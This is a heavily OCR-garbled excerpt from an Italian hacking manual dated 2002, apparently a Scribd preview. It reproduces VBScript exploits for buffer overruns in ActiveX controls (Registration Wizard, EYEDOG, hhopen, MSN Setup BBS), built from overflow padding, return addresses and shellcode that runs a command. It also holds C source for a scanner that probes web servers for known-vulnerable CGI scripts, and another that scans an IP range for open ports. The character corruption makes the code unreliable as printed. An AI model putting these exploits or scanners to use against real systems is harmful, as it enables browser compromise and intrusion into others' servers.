e*pstr I e*pstr N +hr.9"#/ N +hr.@#/ N +hr.@/ N +hr.:<7/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O!6, )1!B )1!
e*pstr I e*pstr N +hr.<9/ N +hr.9@:/
O%&4 )1!
e*pstr I e*pstr N +hr."7/
OM6L )3!B >FF"38+1 .)*it%rocessB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O,eplace with an= command N 7 .automaticall= appended/
e*pstr I e*pstr N ?+1L+.)!)?
O,un e*ploit
setupctl.3istnit I e*pstr
setupctl.InstallNow
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
CCJHKscriptJ
R!5I6C
Hob0ect classidI?clsid(<7)<);39C+7F)C9937C>@F3C7717:8@F#>77? idI?,egAiz6b0?J
HKob0ectJ
Hscript languageI?Lb&cript? JHMCC
msgbo*.?,egistration Aizard >uffer 6verrun? N +hr.97/ N ?Aritten b= &hane
4ird?/
e*pstr I ?Ki
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
1111111111111111111111111111?
OAe overflowed to the ,)5 point of the stac-
ONo NLLOs allowed so ret to HPM% )&%J in &hell;:
e*pstr I e*pstr Q +hr.:;</ O1ddress in &4)LL;:B Ain@" .FF37;<)>/ of PM% )&%
e*pstr I e*pstr Q +hr.<;/ ODou ma= need to use a different address
e*pstr I e*pstr Q +hr.:7"/
e*pstr I e*pstr Q +hr.9:F/
ON6% for debugging purposes
e*pstr I e*pstr N +hr.988/
OM6L )3IB )&%
e*pstr I e*pstr N +hr.9;@/ N +hr.:<:/
O133 )3IB 9@ .&ize of code/
e*pstr I e*pstr N +hr.9;9/ N +hr.9@@/ N +hr.:</
O%&4 )1! .Aindow &t=le )1! I 89898989/
e*pstr I e*pstr N +hr."7/
O%&4 )3I .1ddress of command line/
e*pstr I e*pstr N +hr."F/
OM6L )3!B >FF17@#7 .Ain)*ecB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.@#/ N +hr.@/ N +hr.:<7/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O!6, )1!B )1!
e*pstr I e*pstr N +hr.<9/ N +hr.9@:/
O%&4 )1!
e*pstr I e*pstr N +hr."7/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
OM6L )3!B >FF"38+1 .)*it%rocessB Ain@"/
e*pstr I e*pstr N +hr.9"#/ N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+1LL )3!
e*pstr I e*pstr N +hr.:<</ N +hr.:97/
O,eplace with an= command N 7 .automaticall= appended/
e*pstr I e*pstr N ?+1L+.)!)?
,egAiz6b0.Invo-e,egAizard.e*pstr/
CCJHKscriptJ
!7!,O5
5he following code will terminate the browser(
Hob0ect classidI?clsid(7#1F)+#;C8):9C9937C199:C7717+@7<8;11?
idI?e=e?JHKob0ectJ
Hscript languageI?vbscript?JHMCC
msgbo*.?)D)36E 6L) +ontrol module >uffer 6verrun .Local Lersion/? N +hr.97/
N ?Aritten b= &hane 4ird?/
O%adding for the e*ploit
e*pstr I
?1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
1111111111111111111111111111111111?
O,)5 address .)*it%rocessB >FF"38+1/
e*pstr I e*pstr N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O+all e*ploitable method .M&InfoLoadFile/
e=e.M&InfoLoadFile.e*pstr/
CCJHKscriptJ
HHOP!*
5his willB againB terminate the browser(
Hob0ect
classidI?clsid(9;73FF8;C<F<1C9939C>#F#C7717+@#@F:;;?
idI?hhopen?JHK6>P)+5J
Hscript languageI?vbscript?JHMCC
msgbo*.?hhopen 6L) +ontrol Module >uffer 6verrun? N +hr.97/ N ?Aritten >=
&hane 4ird?/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
e*pstrI?1111111111111111111111111111111
1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111?
OAhere the ,)5 address appears to beB ,)5 to )*it%rocess .>FF"38+1/
e*pstr I e*pstr N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O)*tra padding to trigger the overrun
e*pstr I e*pstr N
?1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
111111111111111111111111111111?
O+all e*ploitable methodB note the valid help file
hhopen.6pen4elp ?Ainhlp;:.hlp?B e*pstr
CCJHKscriptJ
S!4UP++S
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
1gainB shuts down the browser(
Hob0ect
classidI?clsid("F7F<7@;C71F7C9937C>+1@C77+78F3"<11#?
idI?setupbbs?JHK6>P)+5J
Hscript languageI?vbscript?JHMCC
msgbo*.?M&N &etup >>& >uffer 6verrun? N +hr.97/ N ?Aritten b= &hane 4ird?/
e*pstrI?1111111111111111111111111111111
1111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111111111111111111111111
11111111111111111?
O,)5 address .)*it%rocess >FF"38+1/
e*pstr I e*pstr N +hr.:7:/ N +hr.:9:/ N +hr.:8"/ N +hr.9@9/
O5his buffer overrun can be triggered b= either method.
Osetupbbs.v1ddNews&erver e*pstrB true
setupbbs.bIsNews&erver+onfigured e*pstr
CCJHKscriptJ
Test per C!
)cco un sorgente che seve a testare le vulnerabilit$ relative a +EI
/- 5ested on 6lackEare linux Eith kernel !.0.B" -/
Hinclude Qfcntl.h$
Hinclude Qs>s/t>*es.h$
Hinclude Qs>s/socket.h$
Hinclude Qnetinet/in.h$
Hinclude Qsignal.h$
Hinclude Qstdio.h$
Hinclude Qstring.h$
Hinclude Qnetdb.h$
Hinclude Qct>*e.h$
Hinclude Qar*a/nameser.h$
Hinclude Qs>s/stat.h$
Hinclude Qstrings.h$
Hinclude Qstdio.h$
Hinclude Qstdlib.h$
Hinclude Qunistd.h$
Hinclude Qs>s/socket.h$
?oid main(int argc, char -arg?./)
)
int sock,debugm0;
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
struct in'addr addr;
struct sockaddr'in sin;
struct hostent -he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg./ K!00K;
char -cgistr;
char buffer.,0!C/;
int count0;
int numin;
char cgibuff.,0!C/;
char -buff."0/; /- FonYt u think "0 is enoughtZ -/
char -cginame."0/; /- FonYt u think "0 is enoughtZ -/
buff.,/ KI45 /cgi-bin/*hf U55@/,.0OnOnK;
buff.!/ KI45 /cgi-bin/8ount.cgi U55@/,.0OnOnK;
buff.B/ KI45 /cgi-bin/test-cgi U55@/,.0OnOnK;
buff.C/ KI45 /cgi-bin/*h*.cgi U55@/,.0OnOnK;
buff."/ KI45 /cgi-bin/handler U55@/,.0OnOnK;
buff.(/ KI45 /cgi-bin/Eebgais U55@/,.0OnOnK;
buff.#/ KI45 /cgi-bin/Eebsendmail U55@/,.0OnOnK;
buff.D/ KI45 /cgi-bin/Eebdist.cgi U55@/,.0OnOnK;
buff.M/ KI45 /cgi-bin/faxsur?e> U55@/,.0OnOnK;
buff.,0/ KI45 /cgi-bin/htmlscri*t U55@/,.0OnOnK;
buff.,,/ KI45 /cgi-bin/*fdis*al>.cgi U55@/,.0OnOnK;
buff.,!/ KI45 /cgi-bin/*erl.exe U55@/,.0OnOnK;
buff.,B/ KI45 /cgi-bin/EEEboard.*l U55@/,.0OnOnK;
cginame.,/ K*hfK;
cginame.!/ K8ount.cgiK;
cginame.B/ Ktest-cgiK;
cginame.C/ K*h*.cgiK;
cginame."/ KhandlerK;
cginame.(/ KEebgaisK;
cginame.#/ KEebsendmailK;
cginame.D/ KEebdist.cgiK;
cginame.M/ Kfaxsur?e>K;
cginame.,0/ Khtmlscri*tK;
cginame.,,/ K*fdis*la>K;
cginame.,!/ K*erl.exeK;
cginame.,B/ KEEEboard.*lK;
if (argcQ!)
)
*rintf(KOnusage G Js host K,arg?.0/);
*rintf(KOn 7r G Js host -d for debug modeOnOnK,arg?.0/);
exit(0);
0
if (argc$!)
)
if(strstr(K-dK,arg?.!/))
)
debugm,;
0
0
if ((hegethostb>name(arg?.,/)) 3<==)
)
herror(Kgethostb>nameK);
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
exit(0);
0
*rintf(KOnOnOtOt .896 + 2disk/Ys 8II 8heckerOnOnOnK);
startinet'addr(arg?.,/);
counterntohl(start);
socksocket(12'I345, 6789'65:41;, 0);
bco*>(he-$h'addr, (char -)+sin.sin'addr, he-$h'length);
sin.sin'famil>12'I345;
sin.sin'*orthtons(D0);
if (connect(sock, (struct sockaddr-)+sin, si&eof(sin))T0)
)
*error(KconnectK);
0
*rintf(KOnOnOt . @ress an> ke> to check out the htt*d
?ersion...... /OnK);
getchar();
send(sock, KU41F / U55@/,.0OnOnK,,#,0);
rec?(sock, buffer, si&eof(buffer),0);
*rintf(KJsK,buffer);
close(sock);
*rintf(KOnOt . @ress an> ke> to search C 8II stuff...... /OnK);
getchar();

Ehile(countNN Q ,B) /- 8hange ,B to hoE man> buff.Z/ u ha?e abo?e
-/
)
socksocket(12'I345, 6789'65:41;, 0);
bco*>(he-$h'addr, (char -)+sin.sin'addr, he-$h'length);
sin.sin'famil>12'I345;
sin.sin'*orthtons(D0);
if (connect(sock, (struct sockaddr-)+sin, si&eof(sin))T0)
)
*error(KconnectK);
0
*rintf(K6earching for Js G K,cginame.count/);

for(numin0;numin Q ,0!C;numinNN)
)
cgibuff.numin/ YO0Y;
0

send(sock, buff.count/,strlen(buff.count/),0);
rec?(sock, cgibuff, si&eof(cgibuff),0);
cgistr strstr(cgibuff,foundmsg);
if( cgistr T 3<==)
*rintf(K2ound TT ;)OnK);
else
*rintf(K3ot 2oundOnK);

if(debugm,)
)
*rintf(KOnOn ------------------------On Js On
------------------------OnK,cgibuff);
*rintf(K@ress an> ke> to continue....OnK);
getchar();
0
close(sock);
0
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
0
"no scanner di DOM!#!O
)cco un sempRlice scanner di dominio in grado di eseguire lo scan su un range di I%.
/----------------------------------
- Fomain 6canner ?!.0 -
- b> UoIs UeaF -
- 2ixed u* the screE> stuff. -
- (8),MMD UoIs UeaF -
- Xou ma> not modif> and -
- then redistribute -
- this source. -
---------------------------------/
Hinclude Qstdio.h$
Hinclude Qs>s/socket.h$
Hinclude Qs>s/t>*es.h$
Hinclude Qs>s/Eait.h$
Hinclude Qnetinet/in.h$
Hinclude Qerrno.h$
Hinclude Qnetdb.h$
Hinclude Qsignal.h$
?oid brk(int no))
*rintf(K\8 Interru*tTOnK);
exit(,);
0
?oid main(int argc, char --arg?)
)
struct hostent -host; /- init stuff -/
struct sockaddr'in sa;
int net, error;
int *ort!B, i, done0;
char -curr'i*, -del, -cm.,00/;
int 1,, 1!, 1B, 1C;
int A,, A!, AB, AC;
int 8,, 8!, 8B, 8C;
*rintf(KOnFomain 6canner ?!.0 b> UoIs UeaFOnUit an> ke> to
end.OnK);
if(argc Q B))
*rintf(K<sageG domscan i*'begin i*'end *ortOnEhere i*'start
eRuals the
beginning I@(ie ,!#.!(.!(.,)Onand i*'end eRuals the ending I@(ie
,C#.!(.!#.,!)O
nand *ort is the *ort to check onOnOnK);
exit(0);
0
signal(6III35, brk);
if(arg?.B/3<==))
0else)
*ortatoi(arg?.B/);
0
/- @arse in the first I*.... -/
curr'i*arg?.,/;
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
del(char -)strtok(curr'i*, K.K);
1,atoi(del);
del(char -)strtok(3<==, K.K);
1!atoi(del);
del(char -)strtok(3<==, K.K);
1Batoi(del);
del(char -)strtok(3<==, K.K);
1Catoi(del);
/- :ead in 6econd I*... -/
curr'i* arg?.!/;
del(char -)strtok(curr'i*, K.K);
A,atoi(del);
del(char -)strtok(3<==, K.K);
A!atoi(del);
del(char -)strtok(3<==, K.K);
ABatoi(del);
del(char -)strtok(3<==, K.K);
ACatoi(del);
/- VeYre finished *arsing, noE onto the actual scan... -/
8,1,;
8!1!; /- 6aSe Fe; Sa=ue6T -/
8B1B;
8C1C;
for(1C8C;1CQAC; 1CNN))
for(1B8B;1BQAB; 1BNN))
for(1!8!;1!Q8!; 1!NN))
for(1,8,;1,QA,; 1,NN))
s*rintf(curr'i*, KJd.Jd.Jd.JdK, 1,, 1!, 1B, 1C); /-
build the
i* -/
if( ( fork() ) 0)) /-
fork a chi
ld -/
sa.sin'famil> 12'I345;
sa.sin'addr.s'addr inet'addr(curr'i*);
sa.sin'*ort htons(*ort); /-
socket is
set and... -/
net socket(12'I345, 6789'65:41;, 0); /-
create socket -/
if(net Q !))
exit(!);
0
alarm("); /-
Eait " sec
onds until Ee cancel connection -/
error connect(net, (struct sockaddr -)+sa, si&eof sa); /-
attem*t co
nnection -/

error Q 0 Z *rintf(K4rror connecting toG Js JsOnK, curr'i*,
strerror(errno)) G *rintf(K8onnection success atG JsOnK, curr'i*);
shutdoEn(net,
!); /- disconne
ct socket -/
exit(0); /
- exit chi
ld *rocess -/
0

(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
0
0
0
0
gets((char -)i); /- Vait for enter to be *ressed to exit -/
0
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->